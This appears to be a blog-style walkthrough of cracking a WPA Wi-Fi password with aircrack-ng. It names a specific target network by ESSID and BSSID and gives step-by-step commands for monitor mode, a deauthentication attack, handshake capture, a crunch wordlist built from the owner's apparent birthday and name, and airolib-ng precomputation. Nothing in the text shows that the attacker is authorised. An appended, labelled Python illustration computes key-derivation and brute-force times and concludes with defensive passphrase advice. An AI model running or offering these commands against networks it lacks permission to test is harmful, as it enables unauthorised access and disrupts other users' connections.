
# Example: cracking WPA with aircrack-ng

I use a TP-Link WN725N (chipset RTL8188EUS) and Parrot OS.

Connect your Wi-Fi card and check that it is detected:

```bash
iwconfig
```

```bash
airmon-ng check kill
airmon-ng start <iface>
```

```bash
airodump-ng <iface>
```

I will choose Quang Minh 2G (channel 11, BSSID 5C:1A:6F:88:19:19) as the target and monitor it closely:

```bash
airodump-ng -c <CH> --bssid <bssid> -w out <iface>
```

In a new terminal:

```bash
aireplay-ng --deauth 0 -a <bssid> <iface>
```

Wait about 5 s, then return to the airodump-ng terminal. If you see "WPA handshake", the capture is okay; press Ctrl+C to stop both commands.

```bash
ls
```

Create the password list:

```bash
crunch <min> <max> <charset> -t <pattern> -o password.txt
```

Because the file is going to be very, very large, I will reveal this: the password is 8 numbers (I think they are contained in his birthday) and 1 character (I think it is contained in his name).

You can also use Cupp to make such inferences.

The output file is about 11.5 GB and contains 1.2 billion passwords.

Now you can crack WPA with:

```bash
aircrack-ng -w password.txt out*.cap
```

or pipe directly from crunch:

```bash
crunch <min> <max> <charset> -t <pattern> | aircrack-ng -w- out*.cap
```

Add `--bssid 5C:1A:6F:88:19:19` if there is an error saying the BSSID can't be identified.

The cracking speed is at least about 1 kp/s, depending on your processor (normally about 2-3 kp/s).

But I will use a database to speed up the attack.

It takes more time to set up the database (but it will be much faster than a regular crack).

You should only use it if you are creating a permanent database for cracking, because building it takes a long time (or if the password list is not too long).

Install sqlite3:

```bash
sudo apt install sqlite3
```

Create a file `essid.txt` and write the name of the target Wi-Fi network in it.

```bash
airolib-ng crackwpa --import passwd password.txt
airolib-ng crackwpa --import essid essid.txt
```

```bash
airolib-ng crackwpa --batch
```

Now crack with the database; you will be surprised:

```bash
aircrack-ng -r crackwpa out*.cap
```

Done! There is the password (crack speed is about 36 kp/s).
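Why the airolib-ng database needs `essid.txt`, shown as an added example that is not part of the original page: WPA/WPA2-PSK derives the pairwise master key with PBKDF2-HMAC-SHA1 salted by the ESSID, so a precomputed table only matches networks with that exact name, and the time to exhaust a keyspace shows what passphrase length holds up. The ESSIDs, passphrases and function names below are constructed for illustration; the rates and list size are the ones quoted above.

```python
import hashlib


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key (IEEE 802.11i):
    PBKDF2-HMAC-SHA1, ESSID as salt, 4096 iterations, 32-byte output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def table_hits(table_essid, candidates, deployed_essid, deployed_passphrase) -> bool:
    """Model of a precomputed PMK table: True only if the table built for
    table_essid contains the PMK that the deployed network really uses."""
    table = {derive_pmk(p, table_essid) for p in candidates}
    return derive_pmk(deployed_passphrase, deployed_essid) in table


def exhaust_hours(keyspace: int, keys_per_second: float) -> float:
    """Worst-case hours to try every candidate at a given test rate."""
    return keyspace / keys_per_second / 3600


if __name__ == "__main__":
    # Constructed sample values, not taken from any real network.
    guesses = ["12345678a", "19900101q", "87654321b"]

    # Same passphrase, same ESSID: the precomputed table applies.
    print("same ESSID   :", table_hits("HomeNet-A", guesses, "HomeNet-A", "19900101q"))
    # Same passphrase, different ESSID: the salt differs, the table is useless.
    print("renamed ESSID:", table_hits("HomeNet-A", guesses, "HomeNet-B", "19900101q"))

    # The page's list: 1.2 billion candidates at the two quoted rates.
    listed = 1_200_000_000
    print(f"list at 2.5 kp/s: {exhaust_hours(listed, 2_500):.0f} h")
    print(f"list at 36 kp/s : {exhaust_hours(listed, 36_000):.1f} h")

    # Defender's comparison: 16 random characters from [a-z0-9].
    strong = 36 ** 16
    years = exhaust_hours(strong, 36_000) / 24 / 365
    print(f"16 random [a-z0-9] at 36 kp/s: {years:.2e} years")
```

A passphrase built from a birthday and one letter falls inside a list that is exhausted in hours at either rate, while a long random passphrase on a non-default ESSID defeats both the dictionary and any table precomputed for common network names.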


```bash
airmon-ng stop <iface>
service NetworkManager restart
```